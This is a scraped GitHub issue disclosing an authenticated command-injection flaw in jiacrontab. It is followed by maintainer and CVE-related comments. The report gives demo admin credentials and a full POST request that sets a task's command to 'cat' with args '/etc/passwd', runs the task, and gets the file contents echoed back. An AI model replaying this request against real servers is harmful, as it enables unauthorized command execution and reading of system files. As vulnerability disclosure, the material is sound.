Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Test in the demo: http://jiacrontab.iwannay.cn/ User: admin Password: 123456
1.Log in
2.Add task Modify the values of command and args, Read the passwd file.
command=cat&args=/etc/passwd
POST https://jiacrontab.iwannay.cn/crontab/task/edit?addr=localhost%3a20001 HTTP/1.1 Host: jiacrontab.iwannay.cn Connection: keep-alive Content-Length: 192 Cache-Control: max-age=0 Origin: https://jiacrontab.iwannay.cn Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: https://jiacrontab.iwannay.cn/crontab/task/edit?addr=localhost%3a20001 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8,zh-TW;q=0.7 Cookie: access_token= taskId=0&taskName=test&command=cat&args=/etc/passwd&execType=0&timeout=0&optimeout=kill&mailTo=jiacontab%40yopmail.com&apiTo=&maxConcurrent=1&minute=*&hour=*&day=*&month=*&weekday=*&sync=false
3. Successfully added and run this task https://jiacrontab.iwannay.cn/crontab/task/quickStart?taskId=25&addr=localhost:20001
https://jiacrontab.iwannay.cn/crontab/task/quickStart?taskId=25&addr=localhost:20001
4. Get echo
The text was updated successfully, but these errors were encountered:
add path for authenticated command injection Jiacrontab - iwannay/jia…
e213bff
…crontab#28
@GhostStar
Finally, thank you very much for your reminding
Sorry, something went wrong.
Hi @iwannay ! Do you have a refrence link that fix that issue ? Kind regards!
@iwannay please note that a CVE was assigned to this issue. Could you please point out where the fix was made/committed? Cheers !
No branches or pull requests
Test in the demo: http://jiacrontab.iwannay.cn/
User: admin Password: 123456
1.Log in
2.Add task

Modify the values of command and args, Read the passwd file.
3. Successfully added and run this task

https://jiacrontab.iwannay.cn/crontab/task/quickStart?taskId=25&addr=localhost:200014. Get echo

The text was updated successfully, but these errors were encountered: